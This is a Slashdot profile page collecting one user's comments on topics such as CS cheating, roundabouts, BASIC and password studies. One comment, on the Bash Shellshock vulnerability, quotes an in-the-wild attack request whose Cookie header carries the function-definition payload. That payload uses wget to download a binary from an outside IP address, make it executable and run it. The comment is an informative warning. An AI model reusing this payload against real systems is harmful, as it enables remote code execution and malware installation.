Forgot your password?
typodupeerror

Comment: Beware of the Dark Side! (Score 1) 319

by xanthos (#48371391) Attached to: Duke: No Mercy For CS 201 Cheaters Who Don't Turn Selves In By Wednesday

Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.

In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.

There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.

In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".

Comment: So the REAL problem is ... (Score 1) 429

by xanthos (#48113679) Attached to: BitHammer, the BitTorrent Banhammer

1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job

There is a reason I've used this sig for years.

Comment: Will there be roundabouts? (Score 1) 86

by xanthos (#48084699) Attached to: Michigan Builds Driverless Town For Testing Autonomous Cars

I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.

While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?

Comment: Yes it is being exploited (Score 5, Informative) 318

by xanthos (#47996085) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

Comment: Adobe better take a look at their SLA (Score 3, Insightful) 74

by xanthos (#47018895) Attached to: Adobe Creative Cloud Is Back

If one of our sites was down for as long as Adobe's was, heads would roll.

What took so long to restore? Crappy process for restoring server images or recovering a database?

Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.

Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.

Comment: Remember, the B in BASIC is for Beginners (Score 1) 146

by xanthos (#46707301) Attached to: Born To RUN: Dartmouth Throwing BASIC a 50th B-Day Party

Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices not experts, hence the name: Beginners All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the 80's that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down only four Verb types ( Definition, Assignment, I/O, Control) , the operators, and the two type of variables/constants (string/numeric). That's all there is folks. Would I want to try and write a compiler in it, no, but that is not what the language was written for.

Dinosaur trivia points: why do loops commonly use the variable i. (Hint: int does not stand for index.)

Comment: False Conclusion (Score 1) 299

by xanthos (#45576993) Attached to: Why People Are So Bad At Picking Passwords

I hate studies like this. Do people pick common passwords, of course they do. Does everyone pick an easy to guess password, of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.

The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
    1) your account may be compromised if hackers break into the website and steal all the passwords.
    2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.

Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.

"Don't worry about people stealing your ideas. If your ideas are any good, you'll have to ram them down people's throats." -- Howard Aiken

Working...